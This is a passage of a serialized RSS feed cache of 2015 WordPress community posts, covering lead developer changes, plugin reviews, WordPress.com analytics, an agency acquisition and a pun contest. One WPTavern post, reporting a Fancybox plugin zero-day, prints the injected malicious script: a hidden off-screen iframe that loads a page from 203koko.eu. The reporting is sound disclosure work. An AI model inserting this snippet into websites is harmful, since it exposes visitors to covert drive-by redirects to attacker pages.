+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"Post Status: WordPress lead developer changes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=8385\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://poststatus.com/wordpress-lead-developer-changes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4131:\"<p>Yesterday, <a href=\"https://make.wordpress.org/core/2015/02/03/new-lead-developers-helen-and-dion/\">it was announced</a> that Helen Hou-Sandí and Dion Hulse are now lead developers of the WordPress project. That announcement, we learned today, is tied to another: that Peter Westwood and Ryan Boren <a href=\"https://make.wordpress.org/core/2015/02/04/new-chapters-for-ryan-and-westi/\">are stepping down</a> from their lead developer roles.</p>\n<p>Peter and Ryan have been enormously influential on the project.</p>\n<p>Ryan Boren has been committing to the WordPress codebase for over 11 years (aka: since the beginning), and has more commits — 7,961 according to Open Hub — than anyone. Peter has been committing for 7 years, and has 1,261 commits to his name. However, a lead developer’s influence goes well beyond commit; they are the guardians of the project.</p>\n<p>Both Ryan and Peter have been more quiet lately than years prior. Andrew Nacin describes it like so:</p>\n<blockquote><p>For some time now, Ryan and Peter have avoided weighing in on technical matters. Very simply, when you aren’t able to be active in development, you know you’re not up to speed, and you realize your words shouldn’t carry the weight that they do. Being able to make this <a href=\"http://nacin.com/2014/02/07/how-wordpress-chooses-committers/\">judgment</a> is one of the things that makes both of them such great leaders.</p></blockquote>\n<p>Peter will step into an emeritus role:</p>\n<blockquote><p>Peter will be moving into a dormant/inactive/emeritus status. We hope to have him back when his life and work allows. In the meantime, you may see him committing a bug fix here and there, as he is wont to do.</p></blockquote>\n<p>Ryan has shifted his focus, however, and is concentrating fully on UX in WordPress:</p>\n<blockquote><p>Ryan has been focusing all of his energy on improving UX for more than a year, especially for mobile and touch devices, and especially for workflows like media management. So I’m pleased to say he’ll continue to do that:<strong>Ryan will be spearheading UX for WordPress in 2015.</strong> It’s been a while since we’ve had someone truly focusing on just UX, so this is really exciting.</p></blockquote>\n<p>With this shift, Helen and Dion are stepping into official roles to represent their enormous impact on the project over the last several years.</p>\n<p>(Note: this bit of the post will look familiar to Club members)</p>\n<p>Helen works for <a href=\"http://10up.com/\">10up</a>, a WordPress consulting agency, and spends nearly 100% of her time on the WordPress.org project. She <a href=\"https://make.wordpress.org/core/2012/12/18/commit-promotions/\">received commit access</a> in late 2012, at the beginning of the 3.6 release cycle. You can follow <a href=\"https://twitter.com/helenhousandi\">@helenhousandi</a> on Twitter, and <a href=\"http://helenhousandi.com/\">visit her website</a> as well.</p>\n<p>These are the first additions to the list of lead developers for WordPress since Andrew Nacin became a lead in 2012, before the WordPress 3.5 release.</p>\n<p>I asked Andrew Nacin how these decisions are made, and he responded with the following:</p>\n<blockquote>\n<p class=\"p1\"><span class=\"s1\">After each release, the lead developers review the current list of guest committers, potentially propose new committers, etc. Any proposals are finalized through consensus.</span></p>\n</blockquote>\n<p>This is a big honor and an uncommon occurrence for the WordPress project. Major congratulations are due to both Helen and Dion.</p>\n<p>Also, we all owe Peter and Ryan a huge round of applause and thanks for their contributions — past, present, and future — to the WordPress project.</p>\n<p>The WordPress.org <a href=\"https://wordpress.org/about\">About</a> page maintains the list of lead developers for WordPress, and with yesterday and today’s announcement, we’re back to five Lead Developers plus Matt Mullenweg as Project Lead. The website now reflects these changes, with fancy (and totally serious) titles for the new lead developers.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 22:52:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38478\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3172:\"<p>Four hours ago, users seeking support on WordPress.org <a href=\"https://wordpress.org/support/topic/possible-malware-2?replies=41\" target=\"_blank\">reported malware injected into their sites</a> from an unknown source. The vulnerability allows for an iframe to be injected, redirecting to a “203koko” site.</p>\n<pre class=\"brush: xml; light: true; title: ; notranslate\">\n<script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(\' <div style=\"position:absolute;left:-2000px;width:2000px\"><iframe src=\"http://203koko.eu/hjnfh/ipframe2.php\" width=\"20\" height=\"30\" ></iframe></div>\');}/*]]>*/</script>\n</pre>\n<p>After working together to determine the plugins they have in common, users identified <a href=\"https://wordpress.org/plugins/fancybox-for-wordpress/\" target=\"_blank\">Fancybox for WordPress</a> as the culprit. It has since been temporarily removed from the WordPress Plugins Directory, as it hasn’t been updated for two years and poses a security threat to users. The plugin has received more than half a million downloads and is likely in use on thousands of WordPress sites.</p>\n<p><a href=\"https://kovshenin.com/\" target=\"_blank\">Konstantin Kovshenin</a> and <a href=\"http://codeseekah.com/\" target=\"_blank\">Gennady Kovshenin</a> worked together to analyze sites from affected users to confirm the vulnerability. There is currently no patch, so users of the plugin are advised to turn it off immediately.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>If you are running Fancybox for <a href=\"https://twitter.com/hashtag/WordPress?src=hash\">#WordPress</a> turn it off now! It contains a persistent XSS <a href=\"https://twitter.com/hashtag/vulnerability?src=hash\">#vulnerability</a> <a href=\"https://twitter.com/hashtag/security?src=hash\">#security</a> <a href=\"https://twitter.com/hashtag/infosec?src=hash\">#infosec</a></p>\n<p>— Gennady Kovshenin (@soulseekah) <a href=\"https://twitter.com/soulseekah/status/563054468183654400\">February 4, 2015</a></p></blockquote>\n<p></p>\n<p>Analysts at Sucuri have <a href=\"http://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html\" target=\"_blank\">confirmed via Website Firewall logs</a> that the vulnerability is being actively exploited:</p>\n<blockquote><p>After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site. Because it is currently unpatched, we will not disclose more information.</p>\n<p>What makes things worse, is that it’s being actively exploited in the wild, leading to many compromised websites.</p></blockquote>\n<p>Users who have this plugin installed on their sites have no other option than to disable it, as no patch is available yet. The plugin’s author, <a href=\"https://twitter.com/moskis\" target=\"_blank\">José Pardilla</a>, is aware of the issue and <a href=\"https://wordpress.org/support/topic/not-safe-2?replies=3\" target=\"_blank\">responded to an affected user</a> five hours ago in the plugin’s forum on WordPress.org. A patch should be forthcoming.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 20:57:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: WordPress.com Adds Google Analytics for Business Customers Only\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38461\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://wptavern.com/wordpress-com-adds-google-analytics-for-business-customers-only\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3378:\"<p>Last week WordPress.com <a href=\"http://en.blog.wordpress.com/2015/01/29/google-analytics-for-wordpress-com-business-sites/\" target=\"_blank\">announced</a> that Google Analytics is now available for its customers on the <a href=\"https://wordpress.com/plans/\" target=\"_blank\">business tier</a>, which is priced at $299.00 per year. Users have been <a href=\"http://en.forums.wordpress.com/topic/google-analytics-please/page/3?replies=107\" target=\"_blank\">clamoring for the feature</a> for years. While many enjoy using the built-in Stats feature, it is severely limited in comparison to Google Analytics and the data is not portable if the user moves to another publishing platform.</p>\n<p>Business customers can now enter a GA tracking ID under Settings → Analytics screen in the new site management area.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/google-analytics-wpdotcom.png\" rel=\"prettyphoto[38461]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/google-analytics-wpdotcom.png?resize=1025%2C668\" alt=\"google-analytics-wpdotcom\" class=\"aligncenter size-full wp-image-38468\" /></a></p>\n<p>Access to setting up Google Analytics was added to the new backend administration area. Automattic CEO Matt Mullenweg confirms in the comments that all future new features will bypass the old /wp-admin dashboard in favor of the new interface.</p>\n<p>“[There are] no plans to put any new features into the wp-admin dashboard, beyond what comes from core updates from the open source side,” Mullenweg <a href=\"http://en.blog.wordpress.com/2015/01/29/google-analytics-for-wordpress-com-business-sites/#comment-217148\" target=\"_blank\">replied</a> to a comment on the post.</p>\n<p>“You don’t have to stop using wp-admin, and it’s not going anywhere, it’s just not where we’re focusing our energy right now,” he said, in response to a user’s confusion about the two separate admin areas. “As you’ve probably noticed, most of our new updates and iterations are happening in the new interface. You’ll see lots of improvements there in the coming months.”</p>\n<p>Users on the free and premium plans were disappointed that Google Analytics will not be available for all, given that it’s a free service. WordPress.com opted to limit the feature to business customers in order to make it more compelling for users to upgrade to the highest pricing tier. They have taken to the WordPress.com support forums to express <a href=\"http://en.forums.wordpress.com/topic/google-analytics-for-all?replies=2\" target=\"_blank\">dissatisfaction</a> in the feature’s restriction.</p>\n<p>In the past, users have adapted various <a href=\"http://en.forums.wordpress.com/topic/you-can-run-google-analytics-on-a-wordpresscom-blog-heres-how?replies=1\" target=\"_blank\">jerry-rigged methods of adding Google Analytics to WordPress.com sites</a>, using a mapped domain with Cloudflare + Google Analytics enabled. While this is a proven <a href=\"http://jonathonbalogh.com/2012/05/07/how-to-use-google-analytics-on-a-wordpress-com-blog/\" target=\"_blank\">solution</a> for adding the tracking code, it requires using a custom domain with WordPress.com, as well as the ability to follow a few technical instructions. At this time, there is no easy way to add Google Analytics to the bottom tier accounts.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 20:16:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Personalize Profile Headers with the BuddyPress Cover Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38414\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"http://wptavern.com/personalize-profile-headers-with-the-buddypress-cover-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3220:\"<p>Cover photos in user profiles is a design feature in place on many major social networking sites, including Facebook, Twitter, and G+. Users enjoy having the ability to further personalize their profiles beyond the default square avatar. Twitter was one of the last to add this feature to timelines in 2012, and when it did, everyone excitedly rushed to <a href=\"http://mashable.com/2012/09/18/how-to-change-twitter-header-image/\" target=\"_blank\">personalize their header images</a>.</p>\n<p>The <a href=\"https://wordpress.org/plugins/bp-cover/\" target=\"_blank\">BuddyPress Cover</a> plugin was created to bring this feature to BuddyPress sites. It allows users to upload a cover image and adapts nicely to nearly every theme.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover.png\" rel=\"prettyphoto[38414]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover.png?resize=724%2C489\" alt=\"bp-cover\" class=\"aligncenter size-full wp-image-38422\" /></a></p>\n<p>In addition to the AJAX image upload capabilities, the plugin allows the user to drag the image to re-position it. If the image exceeds the maximum file size, the user will see a warning at the top of the page, prompting him to select another. Believe it or not, the plugin even supports animated gifs as cover images.</p>\n<p>BuddyPress Cover also integrates with the activity stream to post an update when a user adds a new cover photo, similar to what you might see on Facebook.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover-activity-update.png\" rel=\"prettyphoto[38414]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover-activity-update.png?resize=644%2C471\" alt=\"bp-cover-activity-update\" class=\"aligncenter size-full wp-image-38440\" /></a></p>\n<p>I tested the plugin with multiple themes and found that it basically inherits the styles and widths included in your active theme. Most likely you won’t have anything to worry about in terms of theme compatibility. The only thing I noticed is that user profile pictures will need to be larger than 140px square or else the plugin will show the mystery man in the header.</p>\n<p>The plugin’s author plans to add the same capabilities to groups so that admins add cover photos to personalize group pages. So far the plugin has received excellent reviews and users are eager to see more features added to it.</p>\n<p>User suggestions for future releases include the ability to select from previously uploaded cover photos and auto-cropping of the photo in activity updates to match the size shown in the cover area. The developer is open to suggestions and has already pushed out a few point releases in response to bug reports and requests.</p>\n<p>The BuddyPress Cover plugin is a valuable addition to any developer’s toolbox, as clients will often request features they have seen on other social networks. If you’re looking to add greater customization capabilities to user profiles while maintaining the clean design of your theme, this plugin fits the bill. You can <a href=\"https://wordpress.org/plugins/bp-cover/\" target=\"_blank\">download</a> it from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 00:03:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"Matt: World Pun Championships\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44646\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"http://ma.tt/2015/02/world-pun-championships/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:848:\"<blockquote><p>The Pun-Off, held annually since 1978, matches the peculiar energy of a place where the unofficial slogan is “Keep Austin Weird.” This is the city, after all, that organizes Eeyore’s Birthday Party, an outdoor costume party honoring the depressed donkey from Winnie-the-Pooh. […]</p>\n<p>It’s a reunion of legends past. Steve Brooks, a country singer with a mop of gray hair, is the only other person besides Ziek to have won both Punslingers and Punniest of Show in the same year. Retired from competition, he now serves as a judge and emcee.</p></blockquote>\n<p><a href=\"http://www.laweekly.com/news/at-the-world-pun-championships-victory-is-easier-said-than-punned-4767308\">Everything about this article about the World Pun Championships in Austin is amazing</a>, I want to quote the entire thing.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 23:58:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: Is WordPress Suffering From The Innovator’s Dilemma?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38412\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/is-wordpress-suffering-from-the-innovators-dilemma\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4845:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovationDilemmaFeaturedImage.png\" rel=\"prettyphoto[38412]\"><img class=\"size-full wp-image-38420\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovationDilemmaFeaturedImage.png?resize=631%2C323\" alt=\"Innovation Dilemma Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/37996588780@N01/273978773\">Scrabble</a> – <a href=\"https://creativecommons.org/licenses/by-sa/2.0/\">(license)</a>\n<p>I’ve used WordPress for more than seven years and I can’t think of any features it has that are innovative. I believe part of the reason is that I’ve been stuck in the WordPress bubble for so long, I haven’t been exposed to different ways of doing things. I only know the WordPress way and that’s a dangerous way of thinking.</p>\n<h2>The Innovator’s Dilemma</h2>\n<p>In 1997, <a class=\"mw-redirect\" title=\"Clayton Christensen\" href=\"http://en.wikipedia.org/wiki/Clayton_Christensen\">Clayton Christensen</a> published the <a title=\"http://en.wikipedia.org/wiki/The_Innovator%27s_Dilemma\" href=\"http://en.wikipedia.org/wiki/The_Innovator%27s_Dilemma\">Innovator’s Dilemma</a>. The book suggests that successful <a class=\"mw-redirect\" title=\"Companies\" href=\"http://en.wikipedia.org/wiki/Companies\">companies</a> can put too much emphasis on customers current needs, and fail to adopt new technology or business models that will meet their customer’s unstated or future needs. Christensen argues that such companies will eventually fall behind.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovatorsDilemma.png\" rel=\"prettyphoto[38412]\"><img class=\"size-full wp-image-38419\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovatorsDilemma.png?resize=571%2C466\" alt=\"Book Cover to Innovators Dilemma\" /></a>Book Cover to Innovators Dilemma\n<p>During his appearance at PressNomics, <a title=\"https://twitter.com/jeffr0/status/558778370792493056\" href=\"https://twitter.com/jeffr0/status/558778370792493056\">Matt Mullenweg said</a> that he’s, “worried we have become too much of an inward facing community and afraid to make a painful leap forward to make the next WordPress.” His statement is open to interpretation, but if you compare the WordPress open source project to a company and its users to customers, perhaps what he’s referring to is the idea that WordPress has fallen into the innovator’s dilemma.</p>\n<h2>External Innovation</h2>\n<p>In the Advanced WordPress Facebook group, Joost de Valk responded to Mullenweg’s statement with, “Most innovation is done outside in, not inside out. But to be honest Matt, that’s where the problem lies too. The ‘inside’ is very negative towards change, and is constantly throwing up hurdles. They like small incremental steps, but fear bigger ones.”</p>\n<p>Core WordPress development is done by a trusted team of people who have remained in core decision-making positions for years. It’s rare that an individual new to the community gets commit access or even gets to lead a release within two years.</p>\n<p>I don’t think it’s impossible, but if brand new contributors from outside of the WordPress bubble have little to no influence on the project, where is the opportunity for external innovation?</p>\n<h2>Leading by Example</h2>\n<p>Another statement Mullenweg made at PressNomics is that he wants to lead another release. Leading a release gives him the opportunity to lead by example and push for big changes, something he feels the community fears.</p>\n<h2>A Thought Experiment</h2>\n<p>What do you think are innovative features in WordPress? I’m especially curious to see how users answer the question versus developers. I’d also like to know what features in other publishing systems WordPress could learn from. An excellent example is the post editor in Medium which Mullenweg <a title=\"https://twitter.com/jeffr0/status/558777784932118531\" href=\"https://twitter.com/jeffr0/status/558777784932118531\">has admitted</a> offers a better experience than WordPress.</p>\n<h2>Can WordPress Avoid Irrelevance?</h2>\n<p>The road to 50% market share is tough and to some, <a title=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share#comment-63337\" href=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share#comment-63337\">is impossible</a> to achieve. Without innovation and continuous improvements to satisfy the needs of users, it’s entirely possible for WordPress to develop itself into irrelevance. Then again, what could WordPress developers do today to prevent this from happening? Is it a matter of changing philosophies and strategies or is it something else?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 23:20:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Human Made Acquires Australian Based WordPress Agency Sennza\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38401\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2074:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/08/MergeFeaturedImage.png\" rel=\"prettyphoto[38401]\"><img class=\"size-full wp-image-28143\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/08/MergeFeaturedImage.png?resize=678%2C252\" alt=\"Merge Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/rutlo/3743291132/\">rutlo</a> – <a href=\"http://creativecommons.org/licenses/by/2.0/\">cc</a>\n<p><a title=\"http://hmn.md/\" href=\"http://hmn.md/\">Human Made</a> has acquired Australian based WordPress development agency <a title=\"http://www.sennza.com.au/\" href=\"http://www.sennza.com.au/\">Sennza</a>. Human Made is a development shop with more than 20 employees and has offices scattered across the world. They’re also a <a title=\"http://vip.wordpress.com/partners/\" href=\"http://vip.wordpress.com/partners/\">WordPress.com VIP partner</a>. Sennza and its three employees will continue to work from their office and become Human Made Australia.</p>\n<p>The move gives Human Made an opportunity to tap into the enterprise market in Australia as well as help out with other projects across Asia, India, and the US West Coast. According to <a 